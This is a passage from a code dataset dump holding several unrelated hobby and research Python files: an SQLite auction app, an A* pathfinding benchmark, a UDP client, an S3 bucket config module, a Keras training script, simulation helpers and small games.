FROM products p inner join sales s on s.pid = p.pid and s.edate > DATE('now') \n LEFT OUTER JOIN previews pr ON p.pid = pr.pid \n group by p.pid\n \t order by count(distinct s.sid) DESC;\n\n ''' \n\n cursor.execute(listProduct_query)\n\n productList = cursor.fetchall()\n \n\n if len(productList) > 1:\n\n for product in productList:\n\n print(product)\n isTrue = True\n\n #if there is no productList, then there's no product to perform additional actions on. \n else: \n isTrue = False\n return\n\n while(isTrue):\n \n isTrue = False\n\n command = input(''' Enter the following key for the corresponding functions\n\n a - to write a review\n\n b - to view reviews of a product\n\n c - to view all active sales associated to the product\n\n ''')\n\n \n\n #if more than 1 character/command entered(Error) \n\n if(len(command) > 1):\n\n print('Invalid command, try again')\n \n isTrue = True\n\n continue #goes to end of loop\n\n \n\n #if invalid character(not 'a','b' or 'c') entered\n\n if(command != 'a' and command != 'b' and command != 'c'): ##check\n\n print('Invalid Command')\n \n isTrue = True\n\n continue #goes to end of loop\n\n \n\n #check for what command is entered and take actions accordingly \n\n if(command == 'a'):\n\n productId = input('''Please enter the pid of the product that you wish to write a review on: ''')\n\n\n write_review(productList,productId, cursor, connection, email)\n\n \n\n if(command == 'b'):\n\n productId = input('''Please enter the pid of the product you wish to view: ''')\n\n view_review(productList,productId, cursor, connection)\n\n \n\n if(command == 'c'):\n\n productId = input('Please enter the pid of the product that you want to see the sales associated with it: ')\n\n view_activeSales(productList,productId, cursor, connection, email)\n\n connection.commit()\n\n\n#function that allows to view review on the product listed \ndef view_review(productList,pid, cursor, connection):\n\n isExists = False\n\n print(pid)\n #checks if the pid entered by the user is a valid pid from the productList\n for each in productList:\n\n\n if( pid == each[0]):\n\n isExists = True\n\n break\n\n \n if(isExists):\n\n cursor.execute(''' SELECT pr.rid, pr.pid, pr.reviewer, AVG(pr.rating), pr.rtext, pr.rdate \n\n FROM products p, previews pr\n \n WHERE p.pid = pr.pid\n AND pr.pid LIKE ?\n group by pr.rid, pr.pid, pr.reviewer, pr.rtext, pr.rdate;\n ''', (pid,))\n\n \n result = cursor.fetchall()\n \n for each in result:\n print(each)\n \n \n else:\n\n print(\"Wrong 
Pid entered\")\n\n connection.commit()\n\n \n\n \n\n \n#function that allows users to write reviews on their chosen product\ndef write_review(productlist,pid, cursor, connection, email):\n\n\n userReview = input(\"Enter a review text: \")\n userRating = int(input(\"Enter a rating(between 1 - 5 inclusive): \"))\n\n\n for each in productlist:\n\n if( pid == each[0]):\n\n isExists = True\n\n break\n\n \n \n if(isExists):\n\n cursor.execute(''' SELECT rid FROM previews; ''')\n allIds = cursor.fetchall()\n new_rid = getNewId(allIds, cursor, connection)\n if(userRating >= 1 and userRating <= 5):\n\n cursor.execute(''' INSERT INTO previews VALUES\n\n (?,?,?,?,?,Date('now'));''', (new_rid, pid, email, userRating, userReview))\n \n \n result = cursor.fetchall()\n \n for each in result:\n print(each)\n\n \n\n else:\n print(\"Invalid rating entered\")\n\n connection.commit()\n\n\n\n#function that allows to view active sales associated to the product \n#then asks the user if they want to see more info on the active sales listed \ndef view_activeSales(productList,pid, cursor, connection, email): \n\n\n isExists = False\n\n for each in productList:\n\n if( pid == each[0]):\n\n isExists = True \n\n break\n\n \n \n if(isExists):\n\n activeSales = cursor.execute('''SELECT s.sid, s.descr, s.rprice, strftime('%s',s.edate) / 86400 - strftime('%s','now') / 86400, strftime('%s',s.edate) / 3600 - strftime('%s','now') / 3600, strftime('%s',s.edate) / 60 - strftime('%s','now') / 60 \nFROM sales s, products p\nWHERE s.sid not in (select s.sid \n\t\tfrom sales s, bids b\n\t\twhere s.sid = b.sid)\nand edate > date('now') and s.pid = ?\nUNION \nSelect s.sid, s.descr, max(b.amount), strftime('%s',s.edate) / 86400 - strftime('%s','now') / 86400, strftime('%s',s.edate) / 3600 - strftime('%s','now') / 3600, strftime('%s',s.edate) / 60 - strftime('%s','now') / 60\nfrom sales s, bids b, products p \nwhere s.sid = b.sid and edate > date('now') and s.pid = ?\ngroup by s.descr, s.sid order by strftime('%s',s.edate) / 60 - strftime('%s','now') / 60''',(pid, pid))\n\n \n \n result = cursor.fetchall()\n \n for each in result:\n print(each)\n \n choice4 = input(\"Do you want to see more info about a sale? (y/n)\")\n if(choice4 == 'y'):\n moreInfo_q1(result, email, cursor, connection)\n connection.commit()\n return;\n\n \n\n else:\n print(\"Wrong Pid entered\")\n\n return\n \ndef moreInfo_q1(results, user, cursor, connection):\n # Gets more information about a certain sale!\n ''' including the email of the lister, the rating of the lister (which includes the number of reviews and the average rating), the sale description, the sale end date and time, the condition, and the maximum bid or the reserved price (if there is no bid). 
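Time remaining is computed in SQL from strftime('%s', edate) deltas, reported as days, hours and minutes. 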
If the sale is associated to a product, the result will also include the product description and the product rating, which includes the number of reviews and the average rating if available or a text that the product is not reviewed\n '''\n # check if its accurate\n chosenSid = input(\"What sales do you want to know more information about?: \")\n valid = validate_sid_q1(results, chosenSid)\n if(not valid):\n print(\"Invalid sid\")\n return False\n # Query the data\n cursor.execute('''select sales.lister, COUNT(reviews.rating), AVG(reviews.rating), sales.descr, sales.edate, sales.cond, sales.rprice, products.descr, COUNT(previews.rating), AVG(previews.rating) \nFROM sales left outer join reviews on reviews.reviewee = sales.lister, products left outer join previews on previews.pid = products.pid\nWHERE sales.sid not in (select sales.sid \n\t\tfrom sales, bids\n\t\twhere sales.sid = bids.sid)\nand edate > date('now')\nand sales.sid LIKE ?\nand products.pid = sales.pid\ngroup by sales.lister, sales.descr, sales.edate, sales.cond, sales.rprice, products.descr\nUNION \nselect sales.lister, COUNT(reviews.rating), AVG(reviews.rating), sales.descr, sales.edate, sales.cond, max(bids.amount), products.descr, COUNT(distinct previews.rating), AVG(previews.rating) \nfrom sales left outer join reviews on sales.lister = reviews.reviewee, bids, products left outer join previews on products.pid = previews.pid\nwhere sales.sid = bids.sid and edate > date('now')\nand sales.sid LIKE ?\nand products.pid = sales.pid\ngroup by sales.lister, sales.descr, sales.edate, sales.cond, products.descr; \n\n''',(chosenSid,chosenSid))\n # Get results table and format\n results = cursor.fetchall()\n print('\\nColumns (Top to bottom):\\nLister | Num ratings | AVG rating | descr | edate | cond | price | Max bid | pdesc | Num previews | AVG prating\\n')\n for info in results:\n for test in info:\n if(test == None):\n print(\"There are no product reviews\")\n else:\n print(test)\n print(\"\", end = '\\n')\n connection.commit()\n # Give user choice on what to do next! -> Bid, list active seller sale, see reviews of the seller!\n choice3 = input(\"Would you like to place a bid? (1) List all active sales of the seller (2) or List all reviews of the seller? (3): \")\n if(choice3 == '1'):\n place_bid_q1(chosenSid, user, results, connection, cursor)\n elif(choice3 == '2'):\n cursor.execute('''SELECT distinct lister from sales where sid LIKE ?''', (chosenSid,))\n result = cursor.fetchone()\n email = result[0]\n list_active_seller_sales_q1(email, cursor, connection)\n elif(choice3 == '3'):\n cursor.execute('''SELECT distinct lister from sales where sid LIKE ?''', (chosenSid,))\n result = cursor.fetchone()\n email = result[0]\n get_reviews_seller_q1(email, cursor, connection)\n else:\n return\n return True\n\ndef validate_sid_q1(results, sid):\n # Validate an entered sid\n valid = False\n for result in results:\n if result[0].upper() == sid.upper():\n valid = True\n break\n return valid \n \ndef place_bid_q1(sid, user, results, connection, cursor):\n # Place a bid on a sale entered by the user (by sid)\n amount = float(input(\"Enter a bid amount: \"))\n cursor.execute(\"SELECT MAX(amount) FROM bids WHERE sid LIKE ?\", (sid,))\n result = cursor.fetchone()\n connection.commit()\n # Check to make sure that the bid is high enough! (Greater than previous max bid!) 
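\n # NOTE (editorial): 'result[0] == None' below works, but 'result[0] is None' is the idiomatic test.\n # 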
-> Still need to integrate random bid generator!!\n if(result[0] == None or result[0] < amount):\n cursor.execute(''' SELECT bid FROM bids; ''')\n allIds = cursor.fetchall()\n bid_id = getNewId(allIds, cursor, connection)\n insertions = (bid_id, user, sid, amount)\n cursor.execute(\"INSERT INTO bids VALUES(?, ?, ?, date('now'), ?)\", insertions)\n connection.commit()\n print(\"Bid successfully placed!\")\n else:\n print(\"Bid amount not high enough!\")\n return\n\ndef list_active_seller_sales_q1(lister, cursor, connection):\n # Query the data to list all the active sales of the seller of a sale!\n cursor.execute('''SELECT s.descr, s.sid, s.rprice, strftime('%s',s.edate) / 86400 - strftime('%s','now') / 86400, strftime('%s',s.edate) / 3600 - strftime('%s','now') / 3600, strftime('%s',s.edate) / 60 - strftime('%s','now') / 60 \nFROM sales s\nWHERE s.sid not in (select s.sid \n\t\tfrom sales s, bids b\n\t\twhere s.sid = b.sid)\nand edate > date('now') and s.lister LIKE ?\nUNION \nSelect s.descr, s.sid, max(b.amount), strftime('%s',s.edate) / 86400 - strftime('%s','now') / 86400, strftime('%s',s.edate) / 3600 - strftime('%s','now') / 3600, strftime('%s',s.edate) / 60 - strftime('%s','now') / 60\nfrom sales s, bids b \nwhere s.sid = b.sid and edate > date('now') and s.lister LIKE ?\ngroup by s.descr, s.sid ORDER by strftime('%s',s.edate) / 60 - strftime('%s','now') / 60 ;''', (lister, lister))\n results = cursor.fetchall()\n print('\\n')\n for result in results:\n print(result)\n connection.commit()\n\ndef get_reviews_seller_q1(lister, cursor, connection):\n # Query the data to get all of the reviews of a given seller of a sale!\n cursor.execute('''SELECT reviewer, rating, rtext, rdate FROM reviews WHERE reviewee LIKE ? ''', (lister,))\n results = cursor.fetchall()\n print('\\n')\n for result in results:\n print(result)\n connection.commit()\n\n\n\n \n\n \n\n \n\n\t\n\n \n\n\n","sub_path":"productBid.py","file_name":"productBid.py","file_ext":"py","file_size_in_byte":12163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"378690179","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport time\nimport os\n\n\nclass PathFindObject:\n def __init__(self, x, y, cost = 1):\n self.x = x\n self.y = y\n self.cost = cost\n self.camefrom = None\n self.gscore = np.inf\n self.fscore = np.inf\n\n @property\n def position(self):\n return np.array([self.x, self.y])\n\n def __call__(self):\n return np.array((self.x,self.y))\n\n\ndef heuristic(pos1, pos2):\n return np.linalg.norm(pos1 - pos2)\n\n\ndef reconstruct_path(target):\n path = [target.position]\n current = target\n while current.camefrom is not None:\n path.append(current.camefrom.position)\n current = current.camefrom\n\n return np.array(path)[::-1]\n\n\ndef find_path(start, target, map_grid):\n target_position = target.position\n start_position = start.position\n\n start.camefrom = None\n start.gscore = 0\n start.fscore = heuristic(start_position, target_position)\n\n open_set = [start]\n open_set_fscores = [start.fscore]\n closed_set = []\n\n map_size = map_grid.shape\n\n while len(open_set) > 0:\n ind = np.argmin(open_set_fscores)\n current = open_set[ind]\n\n if current == target:\n for item in open_set + closed_set:\n item.fscore = np.inf\n item.gscore = np.inf\n return reconstruct_path(target)\n \n open_set.pop(ind)\n open_set_fscores.pop(ind)\n\n closed_set.append(current)\n\n current_pos = current.position\n for i in range(-1, 2):\n for j in range(-1, 
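# all 8 neighbours of the current cell; diagonal steps cost sqrt(2) via np.linalg.norm([i, j])\n 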
2):\n if i == j == 0:\n continue\n \n other_x = current_pos[0] + j\n other_y = current_pos[1] + i\n\n if other_x < 0 or other_x >= map_size[1]:\n continue\n if other_y < 0 or other_y >= map_size[0]:\n continue\n \n neighbor = map_grid[other_y, other_x]\n neighbor_pos = neighbor.position\n\n tentative_gscore = current.gscore + np.linalg.norm([i, j])*neighbor.cost\n\n if tentative_gscore < neighbor.gscore:\n neighbor.camefrom = current\n neighbor.gscore = tentative_gscore\n neighbor.fscore = tentative_gscore + heuristic(neighbor_pos, target_position)\n\n if neighbor not in open_set:\n open_set.append(neighbor)\n open_set_fscores.append(neighbor.fscore)\n else:\n ind = open_set.index(neighbor)\n open_set_fscores[ind] = neighbor.fscore\n \n\ndef plot_path(path, linestyle = \"-\", color = \"black\"):\n path = np.array(path)\n #path[:,1] = len(path[:,1]) - path[:,1]\n plt.plot(path[0][0], path[0][1], marker = \"x\", color = \"red\")\n plt.plot(path[-1][0], path[-1][1], marker = \"x\", color = \"blue\")\n current_pos = path[0]\n for pos in path[1:]:\n plt.plot([current_pos[0], pos[0]], [current_pos[1], pos[1]], color = color, linestyle = linestyle)\n current_pos = pos\n\n plt.axis(\"equal\")\n\n\nif __name__ == \"__main__\":\n with open(\"maptxt_1.txt\", \"r\") as infile:\n lines = infile.readlines()\n height = len(lines)\n width = len(lines[0].strip())\n\n grid = np.zeros((height, width))\n\n print(grid.shape)\n\n for i, row in enumerate(lines):\n for j, item in enumerate(row.strip()):\n if item == \"1\":\n grid[i,j] = 1\n\n grid = grid.T\n\n plt.imshow(grid)\n\n map_grid = np.empty(shape = grid.shape, dtype = PathFindObject)\n for i, row in enumerate(grid):\n for j, val in enumerate(row):\n if val == 1:\n map_grid[i, j] = PathFindObject(j, i, np.inf)\n else:\n map_grid[i, j] = PathFindObject(j, i)\n\n target = map_grid[0, 0]\n\n begin = time.time()\n for i in range(32):\n for j in range(32):\n start = map_grid[i, j]\n find_path(start, target, map_grid)\n time_elapsed = time.time() - begin\n\n count = 32*32\n print(f\"Python: {count} paths computed in:\")\n print(f\"{time_elapsed:2.3f} seconds\")\n print(f\"{time_elapsed/count:2.3f} seconds/path\")\n\n os.system(\"pathfinding.exe\")","sub_path":"python_pathfinding.py","file_name":"python_pathfinding.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"25356592","text":"#!/usr/bin/python\n\nimport socket\nimport random\n\ndef makeList():\n message = []\n for i in range(random.randint(5,20)):\n message.append(random.randint(0,10))\n return message\n\nfor pings in range(10):\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n client_socket.settimeout(1.0)\n message_org = makeList()\n message = bytearray(message_org)\n addr = (\"127.0.0.1\", 22222)\n client_socket.sendto(message, addr)\n try:\n data, server = client_socket.recvfrom(1024)\n print(list(data))\n print(message_org)\n except socket.timeout:\n print('REQUEST TIMED OUT')\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"267694470","text":"from aws_syncr.option_spec.statements import resource_policy_statement_spec, resource_policy_dict\nfrom aws_syncr.formatter import MergedOptionStringFormatter\nfrom aws_syncr.option_spec.documents import Document\nfrom aws_syncr.errors import BadTemplate\n\nfrom input_algorithms.spec_base import 
NotSpecified\nfrom input_algorithms import spec_base as sb\nfrom input_algorithms.spec_base import Spec\nfrom input_algorithms.dictobj import dictobj\n\nfrom option_merge import MergedOptions\nimport six\n\nclass buckets_spec(Spec):\n def normalise(self, meta, val):\n if 'use' in val:\n template = val['use']\n if template not in meta.everything['templates']:\n available = list(meta.everything['templates'].keys())\n raise BadTemplate(\"Template doesn't exist!\", wanted=template, available=available, meta=meta)\n\n val = MergedOptions.using(meta.everything['templates'][template], val)\n\n formatted_string = sb.formatted(sb.string_or_int_as_string_spec(), MergedOptionStringFormatter, expected_type=six.string_types)\n bucket_name = meta.key_names()['_key_name_0']\n\n original_permission = sb.listof(resource_policy_dict()).normalise(meta.at(\"permission\"), NotSpecified if \"permission\" not in val else val[\"permission\"])\n deny_permission = sb.listof(resource_policy_dict(effect='Deny')).normalise(meta.at(\"deny_permission\"), NotSpecified if \"deny_permission\" not in val else val[\"deny_permission\"])\n allow_permission = sb.listof(resource_policy_dict(effect='Allow')).normalise(meta.at(\"allow_permission\"), NotSpecified if \"allow_permission\" not in val else val[\"allow_permission\"])\n\n val = val.wrapped()\n val['permission'] = original_permission + deny_permission + allow_permission\n return sb.create_spec(Bucket\n , name = sb.overridden(bucket_name)\n , location = sb.required(formatted_string)\n , permission = sb.container_spec(Document, sb.listof(resource_policy_statement_spec('bucket', bucket_name)))\n , tags = sb.dictof(sb.string_spec(), formatted_string)\n ).normalise(meta, val)\n\nclass Buckets(dictobj):\n fields = ['items']\n\n def sync_one(self, aws_syncr, amazon, bucket):\n \"\"\"Make sure this bucket exists and has only attributes we want it to have\"\"\"\n if bucket.permission.statements:\n permission_document = bucket.permission.document\n else:\n permission_document = \"\"\n\n bucket_info = amazon.s3.bucket_info(bucket.name)\n if not bucket_info:\n amazon.s3.create_bucket(bucket.name, permission_document, bucket.location, bucket.tags)\n else:\n amazon.s3.modify_bucket(bucket_info, bucket.name, permission_document, bucket.location, bucket.tags)\n\nclass Bucket(dictobj):\n fields = {\n 'name': \"Name of the bucket\"\n , 'location': \"The region the bucket exists in\"\n , 'permission': \"The permission statements to attach to the bucket\"\n , 'tags': \"The tags to associate with the bucket\"\n }\n\ndef __register__():\n return {(80, \"buckets\"): sb.container_spec(Buckets, sb.dictof(sb.string_spec(), buckets_spec()))}\n\n","sub_path":"aws_syncr/option_spec/buckets.py","file_name":"buckets.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"398422255","text":"from random import randint\nplayer=input('rock(r),paper(p), or scissors(s)?')\nprint(player, 'vs')\ncomputer=randint(1,3)\nif computer==1:\n\tcomputer_choice='r'\nelif computer==2:\n\tcomputer_choice='p'\nelse:\n\tcomputer_choice='s'\nprint(computer_choice)\nif player=='r' and computer_choice=='p':\n\tprint('Computer wins because paper covers rock')\nelif player=='s' and computer_choice=='r':\n\tprint('Computer wins because rock smashes scissors')\nelif player=='p' and computer_choice=='s':\n\tprint('Computer wins because scissors cuts paper')\nelif computer_choice=='r' and player=='p':\n\tprint('Player wins because paper covers rock')\n
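# (editorial sketch) this outcome chain could collapse into a lookup, e.g.\n# COMPUTER_WINS = {('r', 'p'), ('s', 'r'), ('p', 's')} # (player, computer_choice) pairs\n# followed by a single membership test.\n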
elif computer_choice=='s' and player=='r':\n\tprint('Player wins because rock smashes scissors')\nelif computer_choice=='p' and player=='s':\n\tprint('Player wins because scissors cuts paper')\nelse:\n\tif player==computer_choice:\n\t\tprint(\"It's a tie\")\nPlay_again=input('Would you like to play again?')\nif Play_again=='y':\n\tprint(player)\nelse:\n\tprint('Game Over')","sub_path":"Rock paper Scissors.py","file_name":"Rock paper Scissors.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"109184566","text":"import os\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n\nimport numpy as np\nimport keras\nimport tensorflow\nfrom keras.optimizers import SGD\n\nimport sys\nsys.path.append(\"..\")\nfrom utils import *\nfrom funcs import *\n\nfrom small_fcnn_att import model_fcnn\nfrom training_functions import *\n\nfrom tensorflow.compat.v1 import ConfigProto\nfrom tensorflow.compat.v1 import InteractiveSession\n\nconfig = ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = InteractiveSession(config=config)\n\ndata_path = 'data_2020/'\ntrain_csv = data_path + 'evaluation_setup/fold1_train.csv'\nval_csv = data_path + 'evaluation_setup/fold1_evaluate.csv'\nfeat_path = 'features/logmel128_scaled_d_dd/'\nexperiments = 'exp_smallfcnn'\n\nif not os.path.exists(experiments):\n os.makedirs(experiments)\n\n# randomly sample the data so that all three classes keep a similar number of training samples\ntotal_csv = balance_class_data(train_csv, experiments)\n\nnum_audio_channels = 2\nnum_freq_bin = 128\nnum_time_bin = 461\nnum_classes = 3\nmax_lr = 0.1\nbatch_size = 32\nnum_epochs = 500\nmixup_alpha = 0.4\nsample_num = len(open(train_csv, 'r').readlines()) - 1\n\n\ndata_val, y_val = load_data_2020(feat_path, val_csv, num_freq_bin, 'logmel')\ny_val = keras.utils.to_categorical(y_val, num_classes)\n\nmodel = model_fcnn(num_classes, input_shape=[num_freq_bin, num_time_bin, 3*num_audio_channels], num_filters=[8, 14, 20], wd=0)\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer =SGD(lr=max_lr, decay=0, momentum=0.9, nesterov=False),\n metrics=['accuracy'])\n\nmodel.summary()\n\nlr_scheduler = LR_WarmRestart(nbatch=np.ceil(sample_num/batch_size), Tmult=2,\n initial_lr=max_lr, min_lr=max_lr*1e-4,\n epochs_restart = [3.0, 7.0, 15.0, 31.0, 63.0,127.0,255.0]) \nsave_path = experiments + \"/model-{epoch:02d}-{val_acc:.4f}.hdf5\"\ncheckpoint = keras.callbacks.ModelCheckpoint(save_path, monitor='val_acc', verbose=1, save_best_only=False, mode='max')\ncallbacks = [lr_scheduler, checkpoint]\n\ntrain_data_generator = Generator_balanceclass_timefreqmask_nocropping_splitted(feat_path, train_csv, total_csv, experiments, num_freq_bin, \n batch_size=batch_size,\n alpha=mixup_alpha, splitted_num=4)()\n\nhistory = model.fit_generator(train_data_generator,\n validation_data=(data_val, y_val),\n epochs=num_epochs, \n verbose=1, \n workers=4,\n max_queue_size = 100,\n callbacks=callbacks,\n steps_per_epoch=np.ceil(sample_num/batch_size)\n ) \n\n","sub_path":"task1b/train/train_smallfcnn.py","file_name":"train_smallfcnn.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"321853585","text":"# -*- coding: utf-8 -*-\n\"\"\"Support Vector Machine (SVM) classification for machine learning.\n\nSVM is a binary classifier. 
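Multi-class problems are handled by reductions such as one-vs-one, which is what scikit-learn's SVC uses internally. 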
The objective of the SVM is to find the best\nseparating hyperplane in vector space which is also referred to as the\ndecision boundary. And it decides what separating hyperplane is the 'best'\nbecause the distance from it and the associating data it is separating is the\ngreatest at the plane in question.\n\nExample:\n\n $ python regularSupportVectorMachine2.py\n\nTodo:\n *\n\"\"\"\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nimport pandas as pd\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import confusion_matrix\n\n# importing the dataset\ndataset = pd.read_csv('Social_Network_Ads.csv')\nfeatures = dataset.iloc[:, [2, 3]].values # Country, Age, Salary\nlabels = dataset.iloc[:, 4].values # Purchased\n\n# Splitting the Dataset into a Training set and a Test set\nfeature_train, feature_test, label_train, label_test = train_test_split(\n features, labels, test_size=0.25)\n\n# Feature scaling, normalize scale is important. Especially on algorithms\n# involving euclidian distance. Two main feature scaling formulas are:\n# Standardisation: x_stand = (x-mean(x))/(standard_deviation(x))\n# Normalisation: x_norm = (x-min(x))/(max(x)-min(x))\nsc_feature = StandardScaler()\nfeature_train = sc_feature.fit_transform(feature_train)\nfeature_test = sc_feature.transform(feature_test)\n\n# Fitting the Support Vector Machine Model to the dataset\nclassifier = SVC(kernel='linear')\nclassifier.fit(feature_train, label_train)\n\n# Predicting the results of the Test set\ny_pred = classifier.predict(feature_test)\n\n# Creating the Confusion Matrix\ncm = confusion_matrix(label_test, y_pred)\n\n# Visualize the Training set results\n\"\"\"X_set, y_set = feature_train, label_train\nX1, X2 = np.meshgrid(\n np.arange(\n start=X_set[:, 0].min() - 1, stop=X_set[:, 0].max() + 1, step=0.01\n ),\n np.arange(\n start=X_set[:, 1].min() - 1, stop=X_set[:, 1].max() + 1, step=0.01\n )\n)\nplt.contourf(\n X1, X2, classifier.predict(\n np.array([X1.ravel(), X2.ravel()]).T\n ).reshape(X1.shape), alpha=0.75, cmap=ListedColormap(('red', 'blue')))\nplt.xlim(X1.min(), X1.max())\nplt.ylim(X2.min(), X2.max())\nfor i, j in enumerate(np.unique(y_set)):\n plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],\n c=ListedColormap(('red', 'blue'))(i), label=j)\nplt.title('Support Vector Machine Model (Training set)')\nplt.xlabel('Age')\nplt.ylabel('Estimated Salary')\nplt.legend()\nplt.show()\"\"\"\n\n\n# Visualize the Test set results\nX_set, y_set = feature_test, label_test\nX1, X2 = np.meshgrid(\n np.arange(\n start=X_set[:, 0].min() - 1, stop=X_set[:, 0].max() + 1, step=0.01\n ),\n np.arange(\n start=X_set[:, 1].min() - 1, stop=X_set[:, 1].max() + 1, step=0.01\n )\n)\nplt.contourf(\n X1, X2, classifier.predict(\n np.array([X1.ravel(), X2.ravel()]).T\n ).reshape(X1.shape), alpha=0.75, cmap=ListedColormap(('red', 'blue')))\nplt.xlim(X1.min(), X1.max())\nplt.ylim(X2.min(), X2.max())\nfor i, j in enumerate(np.unique(y_set)):\n plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],\n c=ListedColormap(('red', 'blue'))(i), label=j)\nplt.title('Support Vector Machine Model (Testing set)')\nplt.xlabel('Age')\nplt.ylabel('Estimated 
Salary')\nplt.legend()\nplt.show()\n","sub_path":"Classification/SupportVectorMachine/regularSupportVectorMachine2.py","file_name":"regularSupportVectorMachine2.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"297692207","text":"#!/usr/bin/env python\n\nimport os\nimport sys \nimport json\nimport time\nfrom collections import OrderedDict\n\nlib_path = os.path.abspath('../../mdwf_lib')\nsys.path.append(lib_path)\nimport mdwf_functions as mdwf\n\n\"\"\" A python script to help with postprocessing of data from an MD simulation.\"\"\"\n\njobid = sys.argv[1]\njobtype = sys.argv[2]\n\ndef main():\n # open and modify local job details file. \n ljdf_t = mdwf.read_local_job_details_file(\".\", \"local_job_details.json\")\n ljdf_t['CurrentJobId'] = jobid\n ljdf_t['JobStatus'] = 'finished'\n ljdf_t['JobFinishTime'] = str(time.time())\n\n with open(\"local_job_details.json\", 'w') as outfile:\n json.dump(ljdf_t, outfile, indent=2)\n outfile.close()\n\n #check the runtime of the job\n start = float(ljdf_t['JobStartTime'])\n finish = float(ljdf_t['JobFinishTime'])\n limit = int(ljdf_t['JobFailTime'])\n walltime = int(ljdf_t['WallTime'])\n mdwf.check_job_fail(start,finish,limit)\n #mdwf.check_walltime(start,finish,walltime)\n\n #move around and rename files \n name = ljdf_t['JobBaseName']\n run = str(ljdf_t['RunCount'])\n if \"opt\" in jobtype:\n mdwf.redirect_optimization_output(name, run)\n else:\n mdwf.redirect_production_output(name, run)\n\n #create pauseflag if all runs completed\n current = int(ljdf_t['RunCount'])\n total = int(ljdf_t['TotalRuns'])\n mdwf.check_round(current, total)\n\n \n \nif __name__ == \"__main__\":\n main()\n\n\n\n","sub_path":"Setup_and_Config/postjob_processing.py","file_name":"postjob_processing.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"184096746","text":"\"\"\"\nModule containing Cubit commands for creating blocks, nodesets and sidesets.\n\"\"\"\n\n\"\"\"\ncreated by Hans-Henning Schippke\ncreated on 21.08.15\nmodified on 21.08.15\n\"\"\"\n\nimport cubit\nfrom basics import cmd\n\n\n# ===================================================================\n# Functions\n# ===================================================================\n\ndef CreateBlock(blockId, entityIdList, elementType, elementTypeID, matID, loadID):\n \"\"\"\n Function creating a block with 'blockId' and 'elementType'.\n Its name is made up of 'elementTypeID', 'matID' and 'loadID'.\n The block contains the surfaces with IDs listed in 'entityIdList'.\n \"\"\"\n\n if type(entityIdList) == str:\n\n cmd('block ' + str(blockId) + ' surface ' + entityIdList)\n\n else: # 
surfaceIdList is a list of integers\n\n cmdString = 'sideset ' + str(id) + ' surface'\n\n for entityId in surfaceIdList:\n cmdString = cmdString + ' ' + str(entityId)\n\n cmd(cmdString)\n\n# ===================================================================\n\n\ndef CreateNodesetBC(nodeSetId, nodeSetName, meshGroupId):\n \"\"\"\n Function creating a nodeset with number 'nodeSetId' consisting of the nodes\n summarised in the mesh group with id 'meshGroupId'. The name of the nodeset\n is defined via 'nodeSetName'.\n \"\"\"\n\n cmd('nodeset ' + str(nodeSetId) + ' node in group ' + str(meshGroupId))\n cmd('nodeset ' + str(nodeSetId) + ' name \"' + nodeSetName + ' ' + str(nodeSetId) + '\"')\n\n# ===================================================================\n\n\ndef CreateNodesetIC(nodeSetId, nodeSetName):\n \"\"\"\n Function creating a nodeset with number 'nodeSetId' consisting of all nodes\n in all surfaces. The name of the nodeset is defined via 'nodeSetName'.\n \"\"\"\n\n cmd('nodeset ' + str(nodeSetId) + ' node in surface all')\n cmd('nodeset ' + str(nodeSetId) + ' name \"' + nodeSetName + ' ' + str(nodeSetId) + '\"')\n\n# ===================================================================\n\n# ===================================================================\n# end | Functions\n# ===================================================================","sub_path":"myCubitModules/createBlockAndSets.py","file_name":"createBlockAndSets.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"255330632","text":"#import module\nimport random\n\ndef game():\n\n #player guesses\n guess = input('Guess the number')\n guess = int(guess)\n\n\n #points\n pts = int(100)\n while pts >= int(-50):\n\n #Correct\n if int(num) == int(guess):\n print('BINGO! You got ' + str(pts) + ' points!')\n break\n\n\n elif int(num) > int(guess):\n #too low\n #minus pts\n pts = pts - int(10)\n print('The number you guessed is too low!' + '\\n You now have ' + str(pts) + ' points!')\n if pts <= int(-50):\n print('Unfortunately, you lost too many points at ' + str(pts) + ' points. The number I was thinking of was ' + str(num) )\n elif pts > int(-50):\n guess = input('Guess again!')\n\n\n elif int(num) < int(guess):\n #too high\n #minus pts\n pts = pts - int(10)\n print('The number you guessed is too high!' + '\\n You now have ' + str(pts) + ' points!')\n if pts <= int(-50):\n print('Unfortunately, you lost too many points at ' + str(pts) + ' points. The number I was thinking of was ' + str(num) )\n elif pts > int(-50):\n guess = input('Guess again!')\n\ndef end():\n #replay option\n reply = input('Do you want to try again? 
